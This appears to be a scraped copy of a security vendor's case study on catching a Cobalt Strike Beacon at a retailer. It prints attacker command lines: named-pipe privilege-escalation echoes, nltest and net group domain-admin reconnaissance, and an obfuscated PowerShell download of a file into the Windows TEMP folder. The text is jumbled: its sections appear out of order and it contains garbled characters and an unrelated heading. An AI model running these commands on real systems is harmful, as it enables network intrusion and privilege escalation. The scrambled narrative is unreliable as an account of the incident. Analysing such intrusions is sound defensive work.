To check the reputation of the artifact, the SOC analyst uploaded the file to an IP monitoring service, which ranked it as having a poor reputation. Observation: On accessing the URL in a controlled sandbox environment, Netsurion detected a file downloaded by the Cobalt Strike Beacon. Named Pipe command are executed to escalate priviledges(Windows Defender has detected threat as -'HackTool:Win32/Named PipeImpers.A')Ĭ:\Windows\system32\cmd.exe /c echo 48e31e1d13a > //./pipe/2d6265">\\.\pipe\2d6265 Highly suspicious activity where rundll32 is loading a non DLL extension file and believed to execute malicious ShellCode.Ĭ:\Windows\system32\cmd.exe /C nltest /dclist:Ĭ:\Windows\system32\cmd.exe /C net group "Domain admins" /domainĬ:\Windows\system32\cmd.exe /C nltest /domain_trustsĬ:\Windows\system32\cmd.exe /C net group "Enterprise admins" /domainĬ:\Windows\system32\net1 group "Enterprise admins" /domainĬ:\Windows\system32\net1 group "Domain admins" /domainĬ:\Windows\system32\cmd.exe /c echo a848bdcc925 > \\.\pipe\c20734 (Windows Defender has detected threat as -'Behavior:Win32/CobaltStrike.H!nri') ttf getting downloaded at the location-''C:\Windows\TEMP\ou.ttf". Powershell -nop -c $ds = ''D'' + ''Own'' + ''LOa'' + ''DfI'' + ''le'' Invoke-Expression (New-Object Net.WebClient).$ds.Invoke ('''', ''C:\Windows\TEMP\ou.ttf'')įile with extension. Suspicious DLL is loaded and '11985756' is parameter passed to 'TstSec' function.Similar commandline arguments are involved in Cobalt Strike attack as shared by security research firms. Malicious Cobalt Strike Tactics and Techniques in MITRE ATT&CK: Netsurion's SOC analyst also noticed a URL in the command line argument. The legacy anti-virus was not sufficient to detect this threat tradecraft. The analyst uncovered a PowerShell running a dubious alert with a command line argument that appeared very suspicious as the parameter “DOWNLOAD FILE” was split as “D” + “Own” + “LOa” + “Dfi” + “le” to evade known detection controls. The Find: Netsurion's SOC detected every detail of this malware attack and provided the retailer with detailed remediation recommendations.
#Cobalt strike beacon getting caught registration#
Cobalt Strike is available for registration and sale on legitimate websites as well as found on the criminal underground. It is powerful and flexible at simulating attacks and testing network defenses. Detailed investigation of the detected sequence showed a Cobalt Strike attack.Ĭobalt Strike is an exploit tool used by defenders and hackers alike. It was then followed by a named pipe command execution for impersonation and privilege escalation.
.png "cobalt strike beacon getting caught")
The Catch: The analyst team at Netsurion's Security Operations Center (SOC) used the advanced logic in the EventTracker platform to detect an obfuscated but suspicious PowerShell command. Enable services like eCommerce that are crucial to retail organizations with supply chain partners and customers around the globe. The Expectation: Protect the retailer’s digital assets and sensitive data to maintain uptime and resiliency by avoiding malicious activity. The Network: A major retailer with over 2,500 employees and more than 100 stores and distribution centers is supported by an MSP who uncovered a cyber criminal weaponizing the legitimate IT tool Cobalt Strike for malware distribution.
0 kommentar(er)
